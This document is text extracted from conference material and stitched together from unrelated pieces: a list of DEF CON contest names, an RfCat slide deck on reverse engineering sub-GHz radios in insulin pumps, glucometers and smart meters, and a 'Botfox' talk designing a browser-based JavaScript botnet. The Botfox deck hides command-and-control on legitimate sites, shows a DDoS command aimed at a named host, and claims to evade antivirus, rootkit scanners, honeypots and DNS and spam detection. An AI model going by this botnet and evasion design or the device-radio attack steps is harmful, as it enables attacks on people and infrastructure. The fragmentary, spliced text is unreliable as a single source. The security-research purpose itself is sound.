Beverage Chilling Contraption Contest
Bomb DEFusing
Capture The Flag
Car Hacking CTF
Capture the Packet
CMD+CTRL Hackathon
Coindroids
Counterfeit Badge Contest
Crash and Compile
Creative Writing: DEF CON Short Story Contest
DEF CON Beard and Moustache Contest
DEF CON DarkNet project
DEF CON Scavenger Hunt
Drunk Hacker History
Hack Fortress
Mission SE Impossible
Packet Detective
Pocket Protector
Schemaverse Championship
SECTF
SECTF4Kids
Sheep Hunt
SOHOpelessly Broken
Tamper-Evident Contest
TD Francis X-Hour Film Contest and Festival
The Box (Bomb Defusal Contest)
warl0ck gam3z
Whose Slide Is It
Wireless CTF
Black Badge Contests at DEF CON
Capture The Flag
Car Hacking CTF
Capture the Packet
Crash and Compile
DEF CON DarkNet Project
DEF CON Scavenger Hunt
Hack Fortress
SECTF
SOHOpelessly Broken
warl0ck gam3z
Wireless CTF
Social Engineering CTF
Crypto and Privacy Challenge
SOHOpelessly Broken
Capture the Packet
Telephreak
Darknet Project
warl0ck gam3z
Wireless CTF
Carhacking Village CTF
Crash and Compile
Scavenger Hunt
OMG 20th Anniversary
Hack Fortress
Capture the Flag
Thank You
Legitimate Business Syndicate
Five incredible years
Five amazing operating systems
Nine Bits of fun!
Call for CTF Organizers
Opens very soon. Stay tuned.
“Super Secret” Announcement
See You Next Year at…
• Caesar's Palace in 2018
• Registration for Hotel begins on Monday
DEF CON 26 is August 9-12th
0x0000
“We are not as strong as we think we are”
● Rich Mullins
<GHz or bust!
leveraging the power of the
chipcon 1111
(and RFCAT)
0x1000 – intro to <GHz
●
FCC Rules (title 47) parts 15 and 18 allocate and govern parts of the
RF spectrum for unlicensed ISM in the US (US adaptation of the
ITU-R 5.138, 5.150, and 5.280 rules)
– Industrial – power grid stuff and more!
– Science – microwave ovens?
– Medical – insulin pumps and the like
●
US ISM bands:
– 300 : 300
– 433 : 433.050 – 434.790 MHz
– 915 : 902.000 – 928.000 MHz
– cc1111 does 300-348, 372-460, 779-928... but we've seen more.
●
Popular European ISM band:
– 868 : 863.000 – 870.000 MHz
●
Other ISM includes 2.4 GHz and 5.8 GHz
– cc2531.... hmmm... maybe another toy?
0x1010 – what is <GHz? what plays there?
●
Industry, Science, Medical bands, US and EU
●
Cell phones
●
Cordless Phones
●
Personal Two-Way Radios
●
Car Remotes
●
Pink IM-ME Girl Toys!
●
TI Chronos Watches
●
Medical Devices (particularly 401-402MHz, 402-405MHz, 405-406MHz)
●
Power Meters
●
custom-made devices
●
Old TV Broadcast
●
much, much more...
● cc1110/cc1111 do 300-348MHz, 391-464MHz, 782-928MHz
– and more...
● RFCAT uses the CC111x on some common dongles
– Chronos dongle (sold with every TI Chonos watch)
– “Don's Dongles”, aka TI CC1111EMK
– IMME (currently limited to sniffer/detection firmware)
● but there are some catches
– rf comms configuration?
– channel hopping sequence?
– bluetooth and DSSS? (not hap'nin)
0x1020 – how do we play with it?
0x1030 – why do i care!?
● the inner rf geek in all of us
● your security research may require that you consider
comms with a wireless device
● your organization may have 900MHz devices that
should be protected!
0x2000 – cc1111 summary SPEED READER!
● modified 8051 core
– 8-bit mcu
– single-tick instructions
– 256 bytes of iram
– 4kb of xram
– XDATA includes all code, iram, xram
– execution happens anywhere :)
● Full Speed USB
● RfCat hides most of these details by default!
0x2010 – cc1111 radio state engine
●IDLE
●CAL
●FSTXON
●RX
●TX
0x2020 – cc1111 radio configuration
● configuring the radio is done through updating a set of
1-byte registers in varying bit-size fields
– MDMCFG4 – MDMCFG0 – modem control
– PKTCTRL1, PKTCTRL0 – packet control
– FSCTRL1, FSCTRL0 – frequency synth control
– FREND1, FREND0 – front end control
– FREQ2, FREQ1, FREQ0 – base frequency
– MCSM1, MCSM0 – radio state machine
– SYNC1, SYNC0 – SYNC word, or the SFD
– CHANNR, ADDR – channel and address
– AGCCTRL2, AGCCTRL1, AGCCTRL0 – gain control
● RfCat hides most of these details by default!
0x2030 Smart RF Studio (ftw)
●
Data Rate, Bandwidth, and Intermediate Frequency and Freq-Deviation depend on each other
0x2100 – RfCat for devs
●
cc1111usb.c provides usb descriptors and framework
–
shouldn't need much tinkering
●
cc1111rf.c provides the core of the radio firmware
–
shouldn't need much tinkering
●
application.c provides the template for new apps
–
copy it and make your amazing toy
●
txdata(buffer, length) to send data IN to host
●
registerCbEP5OUT() to register a callback function to handle data
OUT from host
–
data is in ep5iobuf[]
●
transmit(*buf, length) allows you to send on the RF pipeline
●
appMainLoop() – modify this for handling RF packets, etc...
●
follow the examples, luke!
– RfCat's “application” source is appFHSSNIC.c
0x3000 – radio info we want to know
● frequencies
● modulation (2FSK/GFSK, MSK, ASK/OOK, other)
● intermediate frequency (IF)
● baud rate
● channel width/spacing/hopping?
● bandwidth filter
● sync words / bit-sync
● variable length/fixed length packets
● crc
● data whitening?
● any encoding (manchester, fec, enc, etc...)
0x3010 – interesting frequencies
● 315MHz – car fobs
● 433MHz – medical devices, garage door openers
● 868MHz – EU loves this range
● 915MHz – NA stuff of all sorts (power meters, insulin
pumps, industrial plant equipment, industrial backhaul)
● 2.4GHz – 802.11/wifi, 802.15.4/zigbee/6lowpan, bluetooth
● 5.8GHz – cordless phones
● FREQ2, FREQ1, FREQ0
0x3020 – modulations
● 2FSK/GFSK – Frequency Shift Key
– (digital FM)
– cordless phones (DECT/CT2)
● ASK/OOK – Amplitude Shift Key
– (digital AM)
– morse-code, car-remotes, etc...
● MSK – Minimal Shift Key (a type of quadrature shift
modulation like QPSK)
– GSM
● MDMCFG2, DEVIATN
0x3030 – intermediate frequency
●
mix the RF and LO frequencies to create an IF (heterodyne)
– improves signal selectivity
– tune different frequencies to an IF that can be manipulated easily
– cheaper/simpler components
●
cc1111 supports a wide range of 31 different IF options:
– 23437 hz apart, from 0 – 726.5 khz
●
Smart RF Studio recommends:
– 140 khz up to 38.4 kbaud
– 187.5 khz at 38.4 kbaud
– 281 khz at 250 kbaud
– 351.5khz at 500 kbaud
●
FSCTRL1
0x3040 – data rate (baud)
● much like your modems of old
● the frequency of bits
– some can overlap and get garbage!
● garbage can be good...
● baud has significant impact on IF, Deviation and
Channel BW
● seeing use of 2400, 19200, 38400, 250000
● MDMCFG3 / 4
0x3050 – channel width / spacing
● simplifying frequency hopping / channelized systems
● real freq = base freq + (CHANNR * width)
● MDMCFG0 / 1
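The channel arithmetic above is easy to sanity-check. A minimal sketch in plain Python (not RfCat itself; the 902 MHz base and 250 kHz spacing are example values, not taken from any particular device):

```python
def real_freq_hz(base_hz, channr, spacing_hz):
    # real freq = base freq + (CHANNR * channel spacing), per MDMCFG0/1
    return base_hz + channr * spacing_hz

# e.g. a hypothetical 902 MHz base with 250 kHz channel spacing:
print(real_freq_hz(902_000_000, 5, 250_000))  # 903250000
```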
0x3060 – bandwidth filter
● programmable receive filter
● provides for flexible channel sizing/spacing
● total signal bw = signal bandwidth + (2*variance)
● total signal bw wants to be less than 80% bw filter!
● MDMCFG4
0x3070 – preamble / sync words
● identify when real messages are being received!
● starts out with a preamble (1 0 1 0 1 0 1 0...)
● then a sync word (programmable bytes)
– marking the end of the preamble
– aka 'SFD' – start of frame delimiter
● configurable to:
– nothing (just dump received crap)
– carrier detect (if the RSSI value indicates a message)
– 15 or 16 bits of the SYNC WORD identified
– 30 out of 32 bits of double-SYNC WORD
● SYNC1, SYNC0, MDMCFG2
0x3080 – variable / fixed-length packets
● packets can be fixed length or variable length
● variable length assumes first byte is the length byte
● both modes use the PKTLEN register:
– Fixed: the length
– Variable: MAX length
● PKTCTRL0, PKTLEN
0x3090 – CRC – duh, but not
●
crc16 check on both TX and RX
●
uses the internal CRC (part of the RNG) seeded by 0xffff
●
DATA_ERROR flag triggers when CRC is enabled and fails
●
some systems do this in firmware instead
● PKTCTRL0
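As a rough illustration of the check itself, here is a bit-at-a-time CRC-16 in Python. The 0x8005 polynomial and the 0xFFFF seed follow common descriptions of the cc11xx packet CRC, but treat both as assumptions to verify against the datasheet:

```python
def crc16_cc(data, poly=0x8005, seed=0xFFFF):
    # Serial (MSB-first) CRC-16, seeded 0xFFFF like the cc1111's
    # RNG-based CRC; polynomial is an assumption, check the datasheet.
    crc = seed
    for byte in data:
        for bit in range(8):
            msb = (crc >> 15) & 1
            inbit = (byte >> (7 - bit)) & 1
            crc = (crc << 1) & 0xFFFF
            if msb ^ inbit:
                crc ^= poly
    return crc
```

With no input bits processed, the result is just the seed, which is a quick way to confirm the seeding.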
0x30a0 – data whitening – 9 bits of pain
● ideal radio data looks like random data
● real world data can contain long sequences of 0 or 1
● data to be transmitted is first XOR'd with a 9-bit sequence
– sequence repeated as many times as necessary to
match the data
● PKTCTRL0
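The whitening step is just an XOR with a repeating pseudorandom sequence, so applying it twice restores the original data. A sketch assuming the commonly described PN9 parameters (9-bit LFSR, taps x^9 + x^5 + 1, seeded all-ones; verify against the datasheet):

```python
def pn9_bytes(n, state=0x1FF):
    # 9-bit LFSR (x^9 + x^5 + 1, seed all-ones), as commonly described
    # for cc11xx data whitening; treat the taps as an assumption.
    out = []
    for _ in range(n):
        byte = 0
        for bit in range(8):
            byte |= (state & 1) << bit
            fb = (state & 1) ^ ((state >> 5) & 1)
            state = (state >> 1) | (fb << 8)
        out.append(byte)
    return bytes(out)

def whiten(data):
    # XOR the payload with the repeated PN9 sequence; running it twice
    # gives back the original, since XOR is its own inverse.
    return bytes(b ^ p for b, p in zip(data, pn9_bytes(len(data))))
```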
0x30b0 – encoding
● manchester
– MDMCFG2
● forward error correction
– convolutional
● MDMCFG1
– reed-solomon (not supported)
● encryption - AES in chip
0x30c0 – example: MDMCFG2 register
sorry, couldn't resist
0x3100 – how can we figure it out!?
● open / public documentation
– insulin pump published frequency
● open source implementation / source code
● “public” but harder to find (google fail!)
– fcc.gov – search for first part of FCC ID
● http://transition.fcc.gov/oet/ea/fccid/ -bookmark it
– patents – amazing what people will patent!
● http://freepatentsonline.com
● french patent describing the whole MAC/PHY of one meter
● and another:
http://www.freepatentsonline.com/8189577.html
http://www.freepatentsonline.com/20090168846.pdf
0x3101 – how can we figure it out!? part2
● reversing hw
– tapping bus lines – logic analyzer
● grab config data
● grab tx/rx data
– pulling and analyzing firmware
● hopping pattern analysis
– arrays of dongles – space them out and record results
– hedyattack, or something similar
– spectrum analyzer
– USRP2 or latest gadget from Michael Ossman
● trial and error – rf parameters
● MAC layer? - takes true reversing.. unless you find a patent :)
0x4000 – intro 2 FHSS – SPDY!
● FHSS is common for devices in the ISM bands
– provides natural protection against unintentional
jamming / interference
– US Title 47 CFR 15.247 affords special power
considerations to FHSS devices
● >25khz between channels
● pseudorandom pattern
● each channel used equally (avg) by each transmitter
● if 20db of hopping channel < 250khz:
– must have at least 50 channels
– average <0.4sec per 20 seconds on one channel
● if 20dB of hopping channel >250khz:
– must have at least 25 channels
– average <0.4sec per 10 seconds on one channel
0x4010 – FHSS, the one and only NOT!
●
different technologies:
–
DSSS – Direct Sequence Spread Spectrum
● hops happen more often than bytes (ugh)
● typically requires special PHY layer
–
“FHSS”
● hops occur after a few symbols are transmitted
●
different topologies: (allow for different synch methods)
–
point-to-point (only two endpoints)
–
multiple access systems (couple different options)
● each cell has their own hopping pattern
● each node has own hopping pattern
●
different customers:
–
military has used frequency hopping since Hedy and George submitted the
patent in 1941.
–
commercial folks (WiFi, Bluetooth, proprietary stuff like power meters)
0x4020 – FHSS intricacies
● what's so hard about FHSS?
– must know or be able to come up with the hopping pattern
● can be anywhere from 50 to a million distinct channel hops
before the pattern repeats (or more)
– must be able to synchronize with an existing cell or partner
● or become your own master!
– must know channel spacing
– must know channel dwell time (time to sit on each channel)
– likely need to reverse engineer your target
– DSSS requires that you have special hardware
●
military application will be very hard to crack, as it typically will have hops
based on a synchronized PRNG to select channels
0x4030 – FHSS, the saving graces
● any adhoc FHSS multi-node network: (power meters / sensor-nets)
– node sync in a reasonable timeframe
● limited channels in the repeated pattern
– each node knows how to talk to a cell
● let one figure it out, then tap the SPI bus to see what the
pattern is...
● two keys to determining hopping pattern:
– hop pattern generation algorithm
● often based on the CELL ID
– one pattern gets you the whole cell :)
● others generate a unique pattern per node
– some sync information the cell gives away for free
● gotta tell the n00bs how to sync up, right?
● for single-pass repeating sequences, it's just the channel
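To make the "hop pattern from a CELL ID" idea concrete, here is a toy illustration in Python. This is not any vendor's real algorithm; it only shows how a shared seed can yield a repeatable pattern that uses every channel exactly once per pass:

```python
import random

def hop_pattern(cell_id, n_channels=50):
    # Toy illustration only: derive a repeatable shuffle of all channels
    # from a cell ID acting as the shared seed, so any node that knows
    # the ID can reproduce the whole cell's pattern.
    rng = random.Random(cell_id)
    pattern = list(range(n_channels))
    rng.shuffle(pattern)
    return pattern
```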
0x4040 – FHSS summary
● FHSS comes in different forms for different uses and
different users
● FHSS is naturally tolerant to interference, and allows a
device to transmit higher power than nonFHSS comms
● getting the FHSS pattern, timing, and appropriate sync
method for proprietary comms can be a reversing
challenge
● getting a NIC to do something with the knowledge
gained above has – to date – been very difficult
0x5000 – intro to RfCat
● RfCat: RF Chipcon-based Attack Toolset
● RfCat is many things, but I like to think of it as an interactive
python access to the <GHz spectrum!
0x5010 – rfcat background
● the power grid
– power meters and the folks who love them (yo cutaway,
q, travis and josh!)
– no availability of good attack tools for RF
● vendor at Distributech 2008:
“Our Frequency Hopping Spread Spectrum is too fast
for hackers to attack.”
● OMFW! really?
0x5020 – rfcat goals
● RE tools - “how does this work?”
● security analysis tools - “your FHSS and Crypto is weak!”
● satiate my general love of RF
● a little of Nevil Maskelyne
● “I will not demonstrate to any man who throws doubt upon the
system” - Guglielmo Marconi, 1903
– lulwut?
0x5030 – rfcat's interface
● rfcat
– FHSS-capable NIC
● some assembly may be required for FHSS to arbitrary devices
– toolset for discovering/interfacing with RF devices
● rfcat_server
– access the <GHz band over an IP network or locally and
configure on the fly
– connect to tcp port 1900 for raw data channel
– connect also to tcp port 1899 for configuration
0x5040 – rfcat
● customizable NIC-access to the ISM bands
● ipython for best enjoyment
● lame spoiler: you get a global object called “d” to talk to the
dongle
– d.RFxmit('blah')
– data = d.RFrecv()
– d.discover(lowball=1)
– d.RFlisten()
– help(d)
0x5050 – rfcat_server
● bringing <GHz over the IP network!
● connect on TCP port 1900 to access the wireless network
● connect on TCP port 1899 to access the wireless configuration
● created to allow non-python clients to play too
– stdin is not always the way you want to interact with
embedded wireless protocols
0x5060 – rfsniff (pink version too!)
● focused primarily on capturing data from the wireless network
● IMME used to provide a nice simple interface
● RF config adjustment using keyboard!
0x5065 – rfsniff – key bindings
0x5070 – rfcat wicked coolness – WORKPIX
● d._debug = 1 – dump debug messages as things happen
● d.debug() - print state infoz once a second
● d.discover() - listen for specific SYNCWORDS
● d.lowball() - disable most “filters” to see more packets
● d.lowballRestore() - restore the config before calling lowball()
● d.RFlisten() - simply dump data to screen
● d.RFcapture() - dump data to screen, return list of packets
● d.scan() - scan a configurable frequency range for “stuff”
● print d.reprRadioConfig() - print pretty config infoz
●
d.setMdm*() d.setPkt*() d.make*()
0x5100 – example lab setup
● example RF attack lab setup:
– dongle “Gina” running hedyattack spec-an code
– dongle “Paul” running rfcat
– IMME running rfsniff
– (possibly an IMME's running SpecAn)
– saleae logic analyzer for hacking of the wired variety
– FunCube Dongle and quisk/qthid or other SDR
rf attack form
●
base freq:
●
modulation:
●
baud/bandwidth:
●
deviation:
●
channel hopping?
–
how many channels:
channel spacing:
–
pattern and effective sync method?
dwell period (ms):
●
fixed-/variable-length packets:
len/maxlen:
●
“address”:
●
sync word (if applicable):
●
crc16 (y/n):
does chip do correct style?
●
fec (y/n):
type (convolutional/reed-soloman/other):
●
manchester encoding (y/n):
●
data whitening? and 9bit pattern:
●
more complete information:
http://atlas.r4780y.com/resources/rf-recon-form.pdf
0x6000 – playing with medical devices
● CAUTION: MUCKING WITH THESE CAN KILL PEOPLE.
– THIS FIRMWARE AND CLIENT NOT PROVIDED
● found frequency in the pdf manual from the Internet
– what random diabetic cares what frequency his pump
communicates with!? ok, who cares!
● modulation guessed based on spectrum analysis and trial/error
– the wave form just looks like <blah> modulation!
● other characteristics discovered using a USRP and baudline
(and some custom tools, thanks Mike Ossman!)
0x6010 – the discovery process
● glucometer was first captured using a Spectrum Analyzer
(IMME/hedyattack) to validate the frequency range from the lay
documentation
● next a logic analyzer (saleae) used to tap debugging lines
● next, the transmission was captured using a USRP (thank you
Mike Ossman for sending me your spare!) - alt: FunCube
● next, the “packet capture” was loaded into Baudline, and
analysis performed to identify baudrate and modulation
scheme, and get an idea of bits
● next, Mike Ossman did amazing-sauce, running
the capture through GnuRadio Companion
(the big picture on next slide)
● RF parameters confirmed through RF analysis,
and real-life capture.
0x6011 – discovery reloaded
0x6020 –the immaculate reception
●
punched in the RF parameters into a RFCAT dongle
– created subclass of RFNIC (in python) for new RF config
●
dropped into “discover” mode to ensure I had the modem right
●
●
●
●
●
●
returned to normal NIC mode to receive real packets
●
now need the pump to reverse the bi-dir protocol
0x6100 – playing with a power meter
● CAUTION: MUCKING WITH POWER SYSTEMS WITHOUT APPROPRIATE
AUTHORIZATION IS ILLEGAL, EVEN IF IT IS ON THE SIDE OF YOUR HOUSE!
●
most power meters use their own proprietary “Neighborhood Area Network”
(NAN), typically in the 900MHz range and sometimes 2.4GHz or licensed
spectrum.
●
to get the best reception over distance and gain tolerance to interference, all
implement FHSS to take advantage of the Title 47: Part 15 power
allowances
●
many of the existing meters use the same cc1111 or cc1110 chips, or the
cc1101 radio core
●
this is the reason I'm here today
0x6110 – as sands through the hourglass
● power meter RF comms have long been “unavailable” for
most security researchers
● some vendors understand the benefits of security
rigor by outside researchers
– others, however, do not.
● the gear used in my presentation was given to me by one
who understands
– for various reasons, they have asked to remain
anonymous, however, their security team has a
well founded approach to finding out “how their
baby is ugly” I would like to give them credit for
their commitment to the improved security of their
products.
atlas, tell us what you really think
0x6120 – smart meter – the complication
●
power meters are not so simple as glucometers
– proprietary FHSS in a multiple-access topology
– have to endure the RF abuse of the large metropolis
●
complex mac sync/net-registration
●
not easy to show with a single meter without a Master node.
●
initial analysis was performed via my saleae LA:
●
SpecAn code on IMME's and hedyattack dongles
– good for identifying periods of scanning
●
although the dongle can hop along with the meter, we won't be
demoing synching with the meter today
0x6130 – the approach
●
determine the rf config and hopping pattern through SPI Bus sniffing
(and my saleae again)
●
●
0x6135 – Logic Analyzer
● decoding:
● custom parser for the
target radio--->>>
0x6140 – the approach (2)
● discover mode:
– disables sync-word so radio sends unaligned bits
– algorithm looks for preamble (0xaa or 0x55)
– then determines possible dwords
● ummm... but that's not any bit-derivation of the sync word(s) I
expect. wut? I am confident those are coming from the meter
– intro: Bit Inversion (see highlighted hex)
0x6145 – new developments
● vendors have filed numerous patents with hopping
pattern calculations, comms parameters, etc...
– WIN!
– plenty of work to be done! jump right in!
● http://www.patentstorm.us/patents/7064679/fulltext.html
● http://www.patentstorm.us/patents/7962101/fulltext.html
● http://www.patentstorm.us/applications/20080204272/fulltext.html
● http://www.patentstorm.us/applications/20080238716/fulltext.html
“Abuse is no argument”
- Nevil Maskelyne
0x6150 conclusions
● rfcat discover mode roxors
● rfcat is a foundation for your attack tool
– way more than just a tool in itself
● we are responsible for ensuring our devices use
appropriate security. do not simply expect someone
else to do it. the first med-device death could be your
best friend.
References
●
http://rfcat.googlecode.com
●
http://en.wikipedia.org/wiki/Part_15_(FCC_rules)
●
http://en.wikipedia.org/wiki/ISM_band
●
http://www.ti.com/lit/ds/swrs033g/swrs033g.pdf - “the” manual
●
http://edge.rit.edu/content/P11207/public/CC1111_USB_HW_User_s_Guide.pdf
●
http://www.ti.com/litv/pdf/swru082b
●
http://www.ti.com/product/cc1111f32#technicaldocuments
●
http://www.ti.com/lit/an/swra077/swra077.pdf
●
http://www.newscientist.com/article/mg21228440.700-dotdashdiss-the-gentleman-hackers-1903-lulz.html
●
http://saleae.com/
●
http://zone.ni.com/devzone/cda/epd/p/id/5150 - FSK details (worthwhile!)
●
http://www.radagast.org/~dplatt/hamradio/FARS_presentation_on_modulation.pdf
–
very good detailed discussion on deviation/modulation
●
http://en.wikipedia.org/wiki/Frequency_modulation
●
http://en.wikipedia.org/wiki/Minimum-shift_keying
0xgreetz
● power hardware folk who play nice with security researchers
● cutaway and q (awesome hedyattackers)
● gerard van den bosch
● travis and mossman
● sk0d0 and the four J's
● invisigoth and kenshoto
● Jewel, bug, ringwraith, diva
● Jesus Christ
Botfox – A Study of a Botnet Based on the Browser and Social Engineering
Botnet based on Browser and Social Engineering
Motivation
Did you know?
Today's security defenses are not as robust as you imagine...
Experiments confirm that
"it" can bypass every common security defense in use today...
Can you believe it?
"Its" technical bar is so low that I am the only one using "it"...
Can you believe it?
"Its" deployment cost is very, very low...
Do you agree?
The brain itself is a 0day that can be exploited forever...
About Me
Ant
[email protected]
Academia Sinica
Free/open-source software licensing
Speaker, HITCON (Taiwan's annual hacker conference)
Wow!USB flash-drive antivirus
Wow!ScanEngine antivirus engine
Wow!ARP protection software
Economics
Chaos
Complexity
Programmer
System administrator
Information security intern
OpenFoundry (Open Source Software Foundry)
Maintainer of the official FreeBSD Chinese documentation
Topic
Welcome to the era of Web 2.0
[email protected]
http://www.flickr.com/photos/hawaii/2089328125/
[email protected]
http://www.flickr.com/photos/pablolarah/3549205887/
[email protected]
http://www.flickr.com/photos/libraryman/2528892623/
[email protected]
http://www.flickr.com/photos/daysies/2554510463/
Welcome to the era of the Cloud
[email protected]
http://www.flickr.com/photos/mediaeater/3476903211/
[email protected]
http://www.flickr.com/photos/jaxmac/193001859/
Power . Robust . Convenience
When everything stops being simple...
Welcome to the era of Web 2.0,
and to the era of Bot 2.0
(aka CloudBot)
Bot 1.0
Attacker
C&C Server
Zombies
Victims
Bot 2.0
(aka CloudBot)
Attacker
Tor
Legitimate Server
Bot 1.0
Bot 2.0
Definition of a Botnet
A Command and Control (C&C) topology formed around a malware-controlled platform. The
botnet architecture lets a hacker control bots in bulk and automatically.
Source:
Jeremy Chiu (aka Birdman)
Workshop on Understanding Botnets of Taiwan 2009
The 1st Taiwan Workshop on Botnet Detection and Prevention Technologies
The evolutionary history
of botnets
Photo:
[email protected]
http://www.flickr.com/photos/12426416@N00/490888951
Evolution trends
Extrapolating future patterns
Grouped by protocol
Protocol
1. IRC
2. HTTP
3. P2P
4. Instant Messenger (MSN etc.)
5. Own communication
Botnet Trends Analysis
Photo:
[email protected]
http://www.flickr.com/photos/wileeam/2410989725/
Botnet Trends Analysis
1. Highly covert, hard to trace
2. Leverages social engineering
3. Starting to target embedded devices
4. Trades infection volume for other advantages
Photo:
[email protected]
http://www.flickr.com/photos/wileeam/2410989725/
http://dronebl.org/blog/8
Router Botnet
http://dronebl.org/blog/8
• called 'psyb0t'
• maybe the first botnet worm to target routers and DSL modems
• contains shellcode for many mipsel devices
• not targeting PCs and servers
• uses multiple strategies for exploitation, such as bruteforcing user/pass
• harvests usernames and passwords through deep packet inspection
• can scan for exploitable phpMyAdmin and MySQL servers
Back to the Topic
Botfox – A Study of a Botnet Based on the Browser and Social Engineering
Botnet based on Browser and Social Engineering
Proposing one possible path of future evolution,
so that countermeasures can be prepared early
Botfox *Research*
1. Browser-based
2. Social-engineering-based
3. Pure JavaScript
4. Built on Web 2.0 / the Cloud
Photo:
Sparrow*@flickr.com
http://www.flickr.com/photos/90075529@N00/140896634
Browser-Based
1. Very easy to mimic normal behavior (implemented over ports 80 and 443)
2. Cross-platform (handheld devices, mobile phones, etc.)
3. One of the most commonly used applications
4. A regular on whitelists
5. Uses completely normal DNS queries
Social-Engineering-Based
1. Human nature is the weakest link in information security
2. Patching brains is harder than patching software vulnerabilities
3. Even well-trained users can hardly resist curiosity
Pure JavaScript
1. One of the standard languages of the web
2. Works across browsers
3. Hard for antivirus software to analyze as malware
4. No extra ports need to be opened
Built on Web 2.0 / the Cloud
1. Uses Web 2.0 posting mechanisms
2. Rides on the Cloud's performance and stability
3. Low-cost development: no protocol to design, no C&C to build
4. Legitimate websites serve as cover
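The core mechanic is small: bots fetch an ordinary public page and scan it for a marker the rest of the world ignores. A defensive-analysis sketch of that parsing step (pure Python; the `[[cmd:...]]` marker format is invented for illustration):

```python
import re

# Hypothetical marker format for illustration: a command hidden inside an
# ordinary blog/Twitter/Plurk post as "[[cmd:<verb> <argument>]]".
CMD_RE = re.compile(r"\[\[cmd:([a-z]+) ([^\]]*)\]\]")

def extract_commands(post_text):
    # A bot (or a defender emulating one) scans fetched posts for markers;
    # everything else on the page is legitimate content.
    return CMD_RE.findall(post_text)

post = "Nice weather today! [[cmd:ddos ant.openfoundry.org]] see you all soon"
print(extract_commands(post))  # [('ddos', 'ant.openfoundry.org')]
```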
Attacker
Tor
Legitimate Server
Attacker
Tor
Legitimate Server
Attacker
Tor
Legitimate Server
Waiting for a bite, like fishing
Attacker
Tor
Legitimate Server
Attacker
Tor
Legitimate Server
Spread under the victim's name through their social network (e.g., Email)
Attacker
Tor
Legitimate Server
Attacker
Tor
Legitimate Server
Attacker
Tor
Legitimate Server
Unlike other SPAM delivery methods, this raises the phishing success rate
Attacker
Tor
Legitimate Server
Attacker
Tor
Legitimate Server
Attacker
Tor
Legitimate Server
C&C entries scattered across legitimate sites (e.g., Blog, Twitter, Plurk)
Attacker
Tor
Legitimate Server
Msg
Msg
Launch a DDoS attack against ant.openfoundry.org
Attacker
Tor
Legitimate Server
Msg
Msg
Attacker
Tor
Legitimate Server
Msg
Msg
Bots poll the C&C for messages at irregular intervals
Attacker
Tor
Legitimate Server
Msg
Msg
Attacker
Tor
Legitimate Server
Msg
Msg
Attacker
Tor
Legitimate Server
Msg
Msg
Attacker
Tor
Legitimate Server
Msg
Msg
Attacker
Tor
Legitimate Server
Msg
Msg
Attacker
Tor
Legitimate Server
Msg
Msg
DEMO
Botnet Detection
Photo:
[email protected]
http://www.flickr.com/photos/andreasnilsson1976/2093950981/
AntiVirus
1. The nature of JavaScript makes detection verdicts difficult.
2. No API hooks.
3. No registry entries.
4. No DLLs.
Brand T, brand K, brand S, brand A, brand N, and so on:
it passes every vendor on VirusTotal.
Rootkit Detection
1. The nature of JavaScript makes detection verdicts difficult.
2. No API hooks.
3. No registry entries.
4. No DLLs.
RootkitRevealer, RkHunter, GMER, Panda Anti-Rootkit, Sophos Anti-Rootkit,
Rootkit Hook Analyzer, IceSword, Avira Rootkit Detection, Rootkit UnHooker,
AVG Anti-Rootkit, McAfee Rootkit Detective, DarkSpy, F-Secure BlackLight.
Process Explorer
1. Browser-based.
2. No extra process needed.
3. No DLLs.
Process Explorer, Process Monitor, Combofix, Hijackthis, SREng, EFIX,
Runscanner, Autoruns.
Network Monitor
1. Browser-based; no ports to open.
2. Uses HTTP/HTTPS.
3. Uses normal DNS.
4. Packets/strings carry no malicious content.
TCPView, WireShark, Nmap.
Honeypots
1. Passive honeypots → sidestepped by social-engineering delivery.
2. Active honeypots → bots never talk to each other, so no lists can be harvested.
3. The C&C sits on normal websites; normal vs. abnormal browsing is hard to tell apart.
4. Packets/strings carry no malicious content.
Capture-HPC, Tinyhoneypot, Capture BAT, Google Hack Honeypot,
Honeyd, Honeytrap, Honeywall, Honeyclient.
The straight path: you must become a member of the botnet
Bots do not communicate with each other directly
The crooked part: on the C&C website, normal and abnormal browsing are indistinguishable
Log analysis / Log correlation
Detecting Botnets Through Log Correlation (2006)
Browser-Based
1. Very easy to mimic normal behavior (implemented over ports 80 and 443)
2. Cross-platform (handheld devices, mobile phones, etc.)
3. One of the most commonly used applications
4. A regular on whitelists
5. Uses completely normal DNS queries
BotFox
BotTracer
BotTracer: Execution-based Bot-like Malware Detection (2008)
BotSniffer
BotSniffer: Detecting Botnet Command and Control Channels in Network Traffic (2008)
Behavior/Log Analysis
1. Browser-based, so mimicking normal behavior is very easy.
2. The browser is usually whitelisted.
3. Uses HTTP/HTTPS; packets/strings carry no malicious content.
4. Uses normal DNS.
BotSniffer, BotTracer, Log Analyzer.
Detecting DDNS Bots
Assumption:
1. For DDNS, botnets tend use subdomains; legitimate directories use subdirectories
2. Use SLD/3LD-ratios to identify botnet traffic
Botnet Detection and Response: The Network is the Infection (2005)
Monitoring Group Activities
Differences between Botnet and Legitimate DNS
Botnet Detection by Monitoring Group Activities in DNS Traffic (2007)
Anomaly Detection to DNS Traffic
Assumption: Bots typically employ DDNS
Methods:
1. High DDNS query rates may be expected because
botmasters frequently move C&C servers.
2. looking for abnormally recurring DDNS (NXDOMAIN).
Such queries may correspond to bots trying to locate
C&C servers that have been taken down.
Identifying Botnets Using Anomaly Detection Techniques Applied to DNS Traffic (2008)
Cooperative behavior
A proposal of metrics for botnet detection based on its cooperative behavior (2007)
DNS Traffic
1. Browser-based, so mimicking normal behavior is very easy.
2. Uses normal DNS.
Spam Signatures
Spamming Botnets: Signatures and Characteristics (2008)
SPAM Signatures
1. Uses the victim's own webmail: a legitimate source, so the SPAM signature is weak.
2. Uses several webmail providers (e.g., Gmail, Yahoo) to reduce same-origin signatures.
3. And there are many more ways to dodge SPAM signatures.
IRC Analysis
1. Does not use the IRC protocol.
2. Many network environments ban IRC outright.
3. Many security tools treat IRC packets as suspicious or malicious.
P2P Analysis
1. Does not use a P2P protocol.
2. No arms race with P2P filters.
3. No extra ports opened, lowering the odds of detection.
4. Runs in networks that allow only HTTP/HTTPS.
Open Proxy
1. Does not use open proxies.
2. No extra ports opened, lowering the odds of detection.
VPN
1. VPNs usually allow HTTP/HTTPS through.
Content Filter
1. Packets/strings carry no malicious content → defeats keyword detection.
2. Uses normal DNS → defeats DNS blacklists.
3. The nature of JavaScript makes key signatures hard to extract.
Google Chrome
©Google
Opera
©Opera software
Microsoft IE
©Microsoft
And what's more:
geolocation technology
Geolocation
©Google
©Opera software
©Mozilla
©Microsoft
©Apple
結論
1. 歡迎來到 Bot 2.0 (aka CloudBot) 的時代。
